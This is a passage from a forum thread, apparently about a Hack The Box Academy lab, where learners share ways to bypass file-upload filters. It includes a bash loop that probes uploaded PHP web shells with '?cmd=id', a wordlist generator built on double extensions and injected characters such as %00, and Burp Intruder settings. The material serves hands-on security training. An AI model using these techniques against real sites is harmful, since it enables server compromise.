hey,
thx a lot. with your help i solve this…:)…
For those who are still struggling - EZi0’s comment will get you what you need.
Some steps to help you:
- Modify the script that HTB academy provides to generate your wordlist.txt file with a few extra extensions (ex. .phar and .phtml)
- In burp intruder, send each post request with a PHP payload and the filenames those created by the script.
- Curl each endpoint and supply ‘?cmd=id’ to check for successful 200’s
This is the script I like to use to automate commands feeding in a wordlist as a variable. ex. ./repeat.sh wordlist.txt
#!/bin/bash
#usage: supply your filename wordlist with the execution of this script. It replaces each line with $line
#./repeat.sh wordlist.txt
input=$1
while IFS= read -r line
do
echo 'doing' $line':'
curl -I http://139.59.171.86:32638/profile_images/$line?cmd=id
done < "$input"
Hope that helps
5 Likes
If you haven’t solved it from what I can remember you are super close, try more combinations of characters. The file will be uploaded with the extension you try and will be reachable, you just need to find the right one.
1 Like
Was stuck here for a long time trying to get character injection techniques to work and was not successful. I was able to upload files successfully with character injection but attempts to reference them always came back as 404. I thought this was working because phps was giving me no permissions, but I found anything.phps gave the same error so that message wasn’t indicative of anything.
The advice in this thread around expanding the extensions beyond what you use in the scirpt is helpful and then what I noticed is that phar and phtml had a lot more “successes” than php with character injection, even though I didn’t use character injection this sparked the realization that they were treated differently and a more simple approach with those might work.
Wish I had been able to get character injection going, I tried doing teh curl script after the upload script but just got not found on every file link. Also tried just removing the characters since I would think the goal is that these injections save your file as shell.php but that didn’t work either. In the end, still got there though.
1 Like
Qick tipp: the example from " Reverse Double Extension" works fine for this task (but not with .php, try different one) 
2 Likes
Also can try this tool: GitHub - almandin/fuxploider: File upload vulnerability scanner and exploitation tool.
1 Like
Let me clear up the hint cause it came off a bit confusing.
You can solve it using either
- Reverse Double Extension
- Character Injection
Reverse Double Extension:
=======================
The easier one to solve.
Create a wordlist where file:
- Starts with a php extension ie php
- Ends in a picture format ie jpg
Something like shell.php.jpg
=======================
Character Injection
======================
Trickier becase you can get file successful for a lot of results. However when trying to open the url of them you get 404 not found.
I did notice if you open some via the webpage - right click open image in new tab, the url would be different, but no need to go down this rabbit hole as I did and none of them worked either.
All I can do is expand on what “magic” said because they were right.
Ceate a wordlist from the page it gives you and add some extra php extensions only ie php5, pht, phtml etc
After intruder has finished, run the script “magic” provided.
You will eventually get a 200 response. That’s where the shell is.
Otherwise you will be looking at over 300 that were successfully uploaded manually.
1 Like
Create wordlist.txt
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
for ext in '.php' '.phps' '.phar' '.phtml'; do
echo "hack$ext.jpg" >> wordlist.txt
echo "hack$ext.jpg" >> wordlist.txt
echo "hack.jpg$ext" >> wordlist.txt
echo "hack.jpg$ext" >> wordlist.txt
echo "hack$ext.png" >> wordlist.txt
echo "hack$ext.png" >> wordlist.txt
echo "hack.png$ext" >> wordlist.txt
echo "hack.png$ext" >> wordlist.txt
echo "hack$ext.jpeg" >> wordlist.txt
echo "hack$ext.jpeg" >> wordlist.txt
echo "hack.jpeg$ext" >> wordlist.txt
echo "hack.jpeg$ext" >> wordlist.txt
done
done
Burp → Intruder → Payloads → Load… wordlist.txt
Burp → Intruder → Payloads → uncheck Payload Encoding
Burp → Intruder → Options → Grep - Match → “Extension not allowed” & “Only images are allowed”
1 Like
This took too many hours for me to complete. The steps I took to complete this task:
-
Looking at the source code of script.js you need .jpg, .png, or .jpeg at the end of the filename.
-
Then with the word list creator code in this module run a for loop on the php extensions so you have an output like shell.php.jpg where .php is something else.
-
Then run this word list through burp intruder with payload encoding off. Then I scrolled through and found which ones successfully uploaded and tried those.
-
You can also use burp intruder to find which images you can view. Make sure encoding is off and they will return 200 OK. There are two php extensions that work.